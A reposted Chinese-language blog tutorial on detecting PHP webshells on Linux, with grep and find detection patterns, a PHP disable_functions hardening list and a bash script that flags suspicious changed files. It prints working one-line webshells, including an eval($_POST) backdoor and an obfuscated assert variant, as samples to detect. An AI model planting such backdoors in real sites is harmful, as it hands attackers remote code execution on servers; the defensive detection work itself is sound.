首先認識一下小馬,一般大馬容易暴露,駭客都會留一手,把小馬加入正常PHP文件裏面
<?php eval ($_POST[a]);?>
//密碼爲a,使用中國菜刀連接
隱藏很深的小馬
fputs(fopen(chr(46).chr(47).chr(97)……省略
解碼:
其中chr括號裏面的數字是美國信息交換標準代碼,縮寫:ASCII 可以找一份對照表對應一下
比如
46 就是 .
47 就是 /
32 就是 空格
也可以echo chr(46)解出來
1
<?php
2
echo chr(46).chr(47).chr(97).chr(46)
3
?>
WINDOWS下的應該有很多日誌分析和查殺工具(比如D盾等),那麼,LINUX下如何查找WEBSHELL呢?
1
find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode'
然後就手工查看,寫入計劃任務啦。
只查小馬的可以
1
grep -r --include=*.php '[^a-z]eval($_POST' . > post.txt
2
grep -r --include=*.php '[^a-z]eval($_REQUEST' . > REQUEST.txt
查出來了,重要的是要分析日誌,查看***源頭。
防範:
禁用危險函數,整理權限,防止權限過大
1
disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket
在網上找了一份用PHP查找WEBSHELL的東東,適用數據量小及少
https://github.com/emposha/PHP-Shell-Detector
git 下來 只需要2個文件
shelldetect.php //默認帳號密碼 admin protect
shelldetect.db
如果你有什麼好的建議,感謝你的分享:)
20130826更新
小馬的變種很多,經常會繞過我們的檢查,此時,最好能做把文件進行對比。
比如,網上找的這個PHP一句話
1
<?php $k="ass"."ert";$k(${"_PO"."ST"}['8']);?>
下面提供自己寫的比較簡單的檢查腳本,思路是對比目錄有更新的PHP文件進行匹配。
01
#!/bin/bash
02
# 先RSYNC乾淨的,再執行此腳本最好
03
Date=`date +%Y%m%d_%H:%M`
04
src=/www/www.a.com/
05
dest=/www/www.a.com.bk/
06
log_tmp1=/root/sh/webshell_php.log
07
log_result=/root/sh/webshell_result.log
08
which egrep
09
if [ $? -ne 0 ];then
10
echo "Not Found egrep,exit"
11
exit 0
12
fi
13
rsync -av --include="*/" --include="*.php" --exclude="*" $src $dest|grep -i php > $log_tmp1
14
for diff in `cat $log_tmp1`
15
do
16
egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode|\@preg_replace' "$dest""$diff"
17
if [ $? -eq 0 ];then
18
echo "===========================" >> $log_result
19
echo "$Date" >> $log_result
20
echo "$dest$diff is Dangerous" >> $log_result
21
fi
22
done
原文地址:http://my.oschina.net/longquan/blog/155905
linux查找webshell
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
真實的模擬***綜合實驗
wbzjacky
2019-02-24 13:12:37
Linux核心技能与应用
wy53780
2020-04-23 14:02:05
Python與家國天下
豌豆花下貓
2019-02-24 22:22:40
linux上安裝Docker(非常簡單的安裝方法)
幸運券發放
2019-02-24 19:38:01
2019年Java面試-併發容器篇
王知無
2019-02-24 15:12:46
淺淡個人學習嵌入式Linux過程
wx5c317e5b736d2
2019-02-24 13:31:30
DHCP服務原理與搭建(Linux系統+路由器,二選一方案)
wx5c7174443c6f9
2019-02-24 13:23:18
Redis安裝與配置
劉遄
2019-02-24 13:12:51
Linux查看CPU和內存使用情況
wbzjacky
2019-02-24 13:12:37
相關Linux安全方面的知識點
slqbj
2019-02-24 13:02:39
忘記了Linux密碼,使用GRUB重新設置
slqbj
2019-02-24 13:02:39
Oracle11g 基於linux 6.3下安裝
love壁虎
2019-02-24 12:55:06
Oracle基於Linux 7下的安裝
love壁虎
2019-02-24 12:55:05